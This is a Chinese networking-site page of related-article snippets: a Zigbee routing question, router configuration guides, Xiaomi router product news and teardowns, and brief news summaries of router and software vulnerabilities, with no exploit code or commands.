請(qǐng)問協(xié)調(diào)器是怎么知道終端連著的路由器的？

如題:因?yàn)楝F(xiàn)用到將近50顆終端所以加上四個(gè)路由器從SNIFFER中看到協(xié)調(diào)器發(fā)命令給終端時(shí)協(xié)調(diào)器是先發(fā)到終端連接著的路由器那邊所以想請(qǐng)教一下協(xié)調(diào)器是怎麼知道終端連著的路由器的???謝謝.

2016-09-24 13:22:00

邊界路由器有什么功能？

所謂邊界路由器是將標(biāo)準(zhǔn)的路由軟件看作n路本地路由，并將軟件中的局域網(wǎng)部分?jǐn)U展到廣域網(wǎng)。這將導(dǎo)致遠(yuǎn)程路由器采用一套全新的、并且是極大簡(jiǎn)化了路由軟件功能。

2019-09-30 09:01:58

重啟路由器的具體方法

你沒改過，那么就按銘牌上的填入，如果改了就填入自己改的密碼進(jìn)去?！　∫?b class="flag-6" style="color: red">小米路由器為例，進(jìn)入管理界面后，點(diǎn)擊右上角的上箭頭，就會(huì)看到重啟，點(diǎn)擊它就重啟路由器了。　　　　tplink路由器的重啟位置

2020-12-08 15:24:19

如何配置路由器

如何配置路由器 【實(shí)訓(xùn)目的】（1）熟悉路由器。（2）了解路由器的配置方式。（3）掌握路由器的基本配置命令。（4）了解路

2008-12-07 14:09:48

3158

華為路由器配置命令 (很全的)

華為路由器配置命令 (很全的) 一、access-list 用于創(chuàng)建訪問規(guī)則?！　　　。?）創(chuàng)建標(biāo)準(zhǔn)訪問列表　　　

2009-05-25 08:20:18

11822

路由器網(wǎng)絡(luò)接口解析

路由器網(wǎng)絡(luò)接口解析 Router# show interface e0/0 Ethernet0/0 is up, line protocol is down Hardware is AmdP2, address is 0009.4375.5e20 (bia 0009.4375.5e20) I

2009-08-01 11:46:28

1909

路由器,路由器原理,路由器協(xié)議,路由器算法

路由器,路由器原理,路由器協(xié)議,路由器算法 路由器：連接因特網(wǎng)中各局域網(wǎng)、廣域網(wǎng)的設(shè)備，它會(huì)根據(jù)信道的情況自動(dòng)選擇和設(shè)定路

2010-03-29 17:44:22

1247

路由器基本配置及路由器安全管理配置

掌握利用配置向?qū)?duì) 路由器 進(jìn)行初始配置的步驟和命令，掌握查看路由器狀態(tài)和配置的命令

2011-05-31 10:42:46

小米路由器高顏值

昨日，小米發(fā)布了全新一代路由器，小米路由器HD和小米路由器Pro，兩者外觀一致。

2017-03-03 16:08:09

2032

小米路由器Pro真機(jī)拆解圖分享

小米正式發(fā)布了全新一代小米路由器，有Pro和HD兩個(gè)型號(hào)，二者外觀一直。小米路由器Pro搭載MT7621A MIPS雙核880MHz處理器，內(nèi)置256M SLC閃存和512MB DDR3-1200內(nèi)存，支持800Mbps的2.4GHz Wi-Fi以及1733Mbps的5GHz Wi-Fi。

2017-03-06 17:04:58

73042

最強(qiáng)小米路由器誕生！搭載 MIPS 雙核處理器

在今年的CES上，小米可以說是干貨滿滿，除了發(fā)布白色小米MIX與小米電視4外，另一款重磅新品也同樣備受關(guān)注，那就是小米路由HD 1TB版，售價(jià)為1299元。3月2號(hào)，小米正式召開小米路由新品品鑒會(huì)，由小米路由器掌門人唐沐，介紹了全新的小米路由器 HD以及小米路由PRO。

2017-04-24 16:19:47

5065

小米路由器HD怎么樣？小米路由器HD拆解圖

現(xiàn)在高端路由器沒個(gè)千兆，你都不好意思叫高端路由器，最近小米推出了旗下的高端路由器——小米路由器HD，這款路由器主打大戶型，4天線、金屬機(jī)身、MU-MIMO、內(nèi)置硬盤等，可謂是一款定位發(fā)燒的旗艦路由器，今天我們就來(lái)看看這款小米路由器做的怎么樣吧！

2017-05-05 10:41:59

19971

小米發(fā)布小米路由器3G：外形與小米路由器3完全相同

近日，小米正式發(fā)布了旗下全新的路由器產(chǎn)品：小米路由器3G，它是小米路由器3的升級(jí)版。

2017-06-02 16:17:04

14009

小米路由器迎618購(gòu)物節(jié) 全系路由器降價(jià)還有新路由開售

小米618期間，小米路由器也迎來(lái)了一撥降價(jià)，今天（6月9日）包括小米路由器3/3C/HD/Pro，小米Wi-Fi放大器2等產(chǎn)品都有優(yōu)惠。

2017-06-09 10:37:36

1215

小米路由器3G什么時(shí)候開售？小米路由器3G最新消息：249元開啟預(yù)售！

小米科技的互聯(lián)網(wǎng)智能家居這盤棋中，除了手機(jī)，最重要的就是核心智能路由器了，上個(gè)月，小米低調(diào)上架了一款新款小米路由器3G。

2017-07-23 04:56:05

2725

不可錯(cuò)過的小米路由器3G今日開售，顏值高又有料 249元現(xiàn)貨購(gòu)買

小米路由器3G目前已在小米商城正式開售，小米路由器3G目前是現(xiàn)貨可購(gòu)買。小米路由器3G是小米路由器3的升級(jí)版本，售價(jià)為249元，小米路由器3也降價(jià)至129元

2017-07-29 09:40:06

4415

基于H3C的路由器配置命令詳解

本文檔內(nèi)容介紹了基于H3C的路由器配置命令詳解。

2017-09-20 14:19:57

細(xì)數(shù)家用路由器的8大漏洞

、D-Link等知名廠商。通過厄運(yùn)餅干漏洞，黑客能夠監(jiān)控一切通過與路由器進(jìn)行連接的設(shè)備的所有數(shù)據(jù)，包括文件、電子郵件、登錄信息等，在監(jiān)控的同時(shí)還能在這些數(shù)據(jù)當(dāng)中植入惡意軟件。

2017-10-15 10:05:04

12606

基于漏洞庫(kù)匹配的路由器漏洞探測(cè)技術(shù)

的安全性。因此，路由交換設(shè)備的安全性問題近年來(lái)越來(lái)越受到社會(huì)各界的關(guān)注。統(tǒng)計(jì)表明，目前路南設(shè)備的安全性不容樂觀，不論家用路由器還是企業(yè)骨干網(wǎng)核心路由器都爆出過安全漏洞問題。因此，如果通過技術(shù)手段探測(cè)m路由器交換

2017-11-15 11:46:10

小米路由器、極路由和360路由器橫向非專業(yè)測(cè)評(píng)對(duì)比

在看到這篇東西的時(shí)候，大家估計(jì)已經(jīng)看到了太多的小米路由器的野心實(shí)測(cè)小米路由器之類的專業(yè)文章，所以本文不普及任何技術(shù)參數(shù)，只從一個(gè)重度路由器用戶來(lái)談?wù)勛约簩?duì)小米路由器、360路由器和極路由的看法

2017-12-04 20:43:02

720

小米全新路由器拆解，看看與老款有何區(qū)別

在推出全新小米路由器之前，雷軍說小米的路由器在一年多的時(shí)間里已經(jīng)賣出了200萬(wàn)臺(tái)。此前，小米共有兩款路由器產(chǎn)品，一款是“小米路由器mini”，一款是“小米路由器”，產(chǎn)品售價(jià)分別為129元和699元。推出“全新小米路由器”之后，由于價(jià)格與原來(lái)老款的“小米路由器”一樣，老款的產(chǎn)品隨即在小米網(wǎng)下線。

2018-07-30 09:45:00

32819

小米路由器4評(píng)測(cè) 比普通百兆路由器快3倍還要多

以性價(jià)比代表的小米也在做路由器，而且是小米公司三大主要產(chǎn)品之一（手機(jī)、電視、路由器），截至去年已經(jīng)推出三代設(shè)備，而今年則是迎來(lái)了第四代設(shè)備—小米路由器4。

2018-08-22 14:12:00

21992

全新小米路由器高清拆解圖集

內(nèi)在提升明顯全新小米路由器拆解圖賞

2018-10-30 10:03:55

13844

黑客破解漏洞取得D-Link路由器操控權(quán)

研究員發(fā)現(xiàn)，部分D-Link路由器存在多個(gè)漏洞，黑客利用這些漏洞可獲得其全部控制權(quán)，且目前尚無(wú)安全補(bǔ)丁發(fā)布。在Linksys路由器中也出現(xiàn)了嚴(yán)重安全漏洞。

2018-10-20 11:02:36

4995

小米路由器下線了“自動(dòng)重啟”功能被不少用戶吐槽

近日，小米路由器下線了“自動(dòng)重啟”功能，被不少用戶吐槽。1月21日晚上，小米路由器在官微進(jìn)行了回應(yīng)。

2019-01-22 16:02:23

2115

ThinkPHP5.0.遠(yuǎn)程代碼執(zhí)行漏洞預(yù)警

Thinkphp5.0.*存在遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實(shí)現(xiàn)任意代碼執(zhí)行等高危操作。

2019-01-26 16:26:00

2976

小米表示將推出旗下的新一代旗艦路由器

小米路由器已經(jīng)有很長(zhǎng)時(shí)間沒有更新了，消費(fèi)者也希望能夠盡快看到小米推出新一代的路由器，而現(xiàn)在小米官方已經(jīng)表示旗下的新一代旗艦路由器即將到來(lái)。

2019-02-28 10:59:20

1315

小米路由器4A和千兆版有什么區(qū)別

3月12日，小米路由器正式發(fā)布小米路由器4A和小米路由器4A千兆版兩款路由器新品，售價(jià)分別為119元和169元。

2019-03-15 09:01:00

48979

小米路由器4A千兆版的區(qū)別分析

3月12日，小米路由器正式發(fā)布小米路由器4A和小米路由器4A千兆版兩款路由器新品，售價(jià)分別為119元和169元。目前，小米路由器4A已經(jīng)正式開售，而小米路由4A千兆版將于3月19日首售。那么小米同時(shí)發(fā)布的兩款路由器究竟有哪些差別呢？

2019-03-14 11:45:33

25195

淺析漏洞對(duì)Cisco RV320、RV325兩款路由器的影響

和驗(yàn)證。該組漏洞主要對(duì)Cisco RV320和RV325兩款雙千兆WAN VPN路由器造成影響，兩個(gè)漏洞結(jié)合利用可以達(dá)到允許未經(jīng)身份授權(quán)的遠(yuǎn)程攻擊者執(zhí)行任意命令的目的。對(duì)此，安天微嵌分析小組驗(yàn)證了該漏洞的原理及POC，對(duì)該漏洞的影響范圍進(jìn)行了確認(rèn)，并給出了相應(yīng)的防護(hù)建議。

2019-05-17 15:44:57

3303

小米路由器HD和榮耀路由Pro2哪個(gè)好

買榮耀路由Pro 2還是小米路由器HD？作為目前兩款熱銷的路由產(chǎn)品，榮耀路由Pro 2和小米路由器HD不免會(huì)被各自的粉絲拿來(lái)進(jìn)行比較！那么，榮耀路由Pro 2和小米路由器HD哪個(gè)好？是該買榮耀路由

2019-07-19 11:47:39

10442

小米路由器獲天貓38女神節(jié)首日路由器行業(yè)品牌銷售額第一

天貓38女神節(jié)首日，小米路由器榮獲“路由器行業(yè)品牌銷售額”第一。即日起至3月8日，小米路由器最高直降100元，全場(chǎng)低至59元起。

2020-03-07 15:12:50

2074

TP-Link命令注入漏洞警報(bào)

根據(jù)ZDI分析報(bào)告，受影響的路由器中的二進(jìn)制程序/usr/bin/tdpServer中存在命令注入漏洞。此二進(jìn)制程序運(yùn)行在TP-Link Archer A7（AC1750）路由器上，硬件版本5，MIPS體系結(jié)構(gòu)，固件版本190726。

2020-05-01 17:33:00

1425

小米路由器也支持WiFi6+是真是假

小米路由器官方微博正式宣布，小米AloT路由器AX3600今天起將陸續(xù)推送OTA更新。此次升級(jí)非常重要，手上擁有小米路由器AX3600的用戶不容錯(cuò)過。

2020-05-14 11:40:38

9111

如何利用路由器遠(yuǎn)程運(yùn)維

什么是4G工業(yè)路由器？如何利用路由器遠(yuǎn)程運(yùn)維？工業(yè)路由器都有些什么功能？這些問題我們平時(shí)在使用路由器或項(xiàng)目中都可能會(huì)遇到。

2020-06-03 10:54:01

1157

小米路由器速率高達(dá)6000兆級(jí)

小米將于12月28日發(fā)布小米11新品，屆時(shí)小米高端路由器新品也將同臺(tái)亮相。

2020-12-24 10:44:16

2820

小米路由器AX6000正式上架京東開售

在2020年12月28日的小米11新品發(fā)布會(huì)上，小米發(fā)布了首款支持“Wi-Fi6增強(qiáng)版”技術(shù)的高端新品路由器：小米路由器AX6000。

2020-12-29 09:45:16

3504

小米AIoT路由器AX6000全渠道開啟預(yù)約

稍早前，小米路由器官微正式官宣，即將推出小米路由器WiFi6增強(qiáng)版。12月28日，小米11系列手機(jī)發(fā)布會(huì)正式開幕，會(huì)上由雷軍發(fā)布了小米首款支持“Wi-Fi 6增強(qiáng)版”技術(shù)的高端路由器——小米AIoT路由器AX6000。小米官方介紹稱其是小米最高端路由器，這款產(chǎn)品售價(jià)599元。

2020-12-29 10:51:30

2013

思科升級(jí)遠(yuǎn)程命令執(zhí)行等高危漏洞

1月19日，思科發(fā)布了安全公告，旗下小型企業(yè)RV110W，RV130，RV130W和RV215W路由器中發(fā)現(xiàn)了遠(yuǎn)程命令執(zhí)行等高危漏洞，建議盡快升級(jí)。以下是漏洞詳情：

2021-01-20 15:40:49

1529

4G工業(yè)路由器高鐵、公路隧道遠(yuǎn)程監(jiān)測(cè)

4G工業(yè)路由器高鐵、公路隧道遠(yuǎn)程監(jiān)測(cè)

2021-11-10 10:33:20

346

漏洞挖掘工具afrog軟件簡(jiǎn)介

afrog 是一款性能卓越、快速穩(wěn)定、PoC 可定制的漏洞掃描（挖洞）工具，PoC 涉及 CVE、CNVD、默認(rèn)口令、信息泄露、指紋識(shí)別、未授權(quán)訪問、任意文件讀取、命令執(zhí)行等多種漏洞類型，幫助網(wǎng)絡(luò)安全從業(yè)者快速驗(yàn)證并及時(shí)修復(fù)漏洞。

2022-09-13 09:06:27

993

D-Link多款路由器存在命令注入的攻擊

CVE-2022-1262，多款D-Link 路由器固件映像上的 /bin/protest二進(jìn)制文件容易受到命令注入的攻擊。這允許經(jīng)過身份驗(yàn)證的攻擊者以 root 身份執(zhí)行任意 shell 命令，并且可以很容易地用于在設(shè)備上獲取 root shell。

2022-09-22 16:23:03

1210

Cisco路由器調(diào)試命令大全

在配置Cisco路由器時(shí)，全局和接口命令的界限是十分明顯的。在這種情況下，我們使用“全局”來(lái)標(biāo)識(shí)那些不能用于接口調(diào)試或者特定的傳輸介質(zhì)類型和協(xié)議調(diào)試的命令。

2023-02-19 11:40:43

1046

看圖片也能中招的漏洞原理

漏洞描述：ImageMagick 在處理惡意構(gòu)造的圖片文件時(shí)，對(duì)于文件中的 URL 未經(jīng)嚴(yán)格過濾，可導(dǎo)致命令注入漏洞。通過命令注入漏洞，黑客可以在服務(wù)器上執(zhí)行任意系統(tǒng)命令，獲取服務(wù)器權(quán)限。

2023-04-06 10:25:04

195

路由器安全性低和開放的修護(hù)措施

　　路由器對(duì)于網(wǎng)絡(luò)來(lái)說，它是一種過渡性的工具，它對(duì)網(wǎng)絡(luò)的使用也有著非常重要的作用。路由器的漏洞主要分為密碼破解漏洞、Web漏洞、后門漏洞和溢出漏洞，但是大部分的路由器漏洞都是與路由器質(zhì)量的好壞有重要的關(guān)系的。

2023-05-09 14:32:43

1967

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

大概是在上半年提交了某個(gè)CMS的命令執(zhí)行漏洞，現(xiàn)在過了那么久，也想通過這次挖掘通用型漏洞，整理一下挖掘思路，分享給大家。

2023-05-18 17:18:58

2147

通達(dá)OA漏洞檢測(cè)工具介紹

通達(dá)OA v11.8 gateway.php 遠(yuǎn)程文件包含漏洞通達(dá)OA v11.6 print.php未授權(quán)刪除auth.inc.php導(dǎo)致RCE 通達(dá)OA v11.10 getdata 任意文件上傳 ? 漏洞檢

2023-06-12 09:13:53

3320

路由器常見協(xié)議有哪些？

智能性，可通過讀取每個(gè)數(shù)據(jù)包的地址后來(lái)決定如何行傳送。無(wú)論是我們家中常用的家用路由器還是企業(yè)路由器或者工業(yè)級(jí)路由器都是如此。為什么路由器要用到協(xié)議呢？實(shí)際上路由器是通

2022-05-10 14:24:12

1316

什么是VPN？工業(yè)VPN路由器優(yōu)勢(shì)解析

工業(yè)路由器是在普通路由器的基礎(chǔ)上增加工業(yè)應(yīng)用功能、加強(qiáng)做工材質(zhì)的工業(yè)版本，而工業(yè)VPN路由器是在工業(yè)路由器的基礎(chǔ)上增加的VPN功能。那么，工業(yè)路由器為什么要設(shè)置VPN功能？加了VPN功能有什么優(yōu)勢(shì)

2022-09-27 10:15:29

658

labview讀取解析CAN DBC文件

labview讀取解析can總線dbc文件

2023-07-03 09:18:26

小米路由器如何配置Mesh組網(wǎng)？

小米路由器如何配置Mesh組網(wǎng)？小米路由器是許多用戶喜愛的網(wǎng)絡(luò)設(shè)備之一，而Mesh組網(wǎng)則是提供了更強(qiáng)大、更穩(wěn)定的無(wú)線覆蓋和更流暢的網(wǎng)絡(luò)體驗(yàn)。本文將為您詳細(xì)介紹如何配置小米路由器的Mesh組網(wǎng)，幫助

2024-02-04 14:00:36

1184

小米路由器如何配置有線橋接？

小米路由器如何配置有線橋接？小米路由器作為一款智能、高性能的路由器產(chǎn)品，在無(wú)線網(wǎng)絡(luò)覆蓋方面表現(xiàn)出色，但如果你的家庭或辦公環(huán)境需要更廣闊的網(wǎng)絡(luò)覆蓋，有線橋接便是一種理想的解決方案。本文將詳細(xì)介紹小米

2024-02-04 14:07:41

796

蘋果修復(fù)macOS Ventura和Sonoma內(nèi)存漏洞

蘋果強(qiáng)調(diào)，該漏洞可影響macOS Ventura及macOS Sonoma系統(tǒng)，攻擊者可借此生成惡意文件。用戶一旦點(diǎn)擊瀏覽，可能引發(fā)應(yīng)用程序異常關(guān)閉甚至造成任意代碼執(zhí)行風(fēng)險(xiǎn)。

2024-03-14 11:43:46

已全部加載完成

搜索歷史

小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析

評(píng)論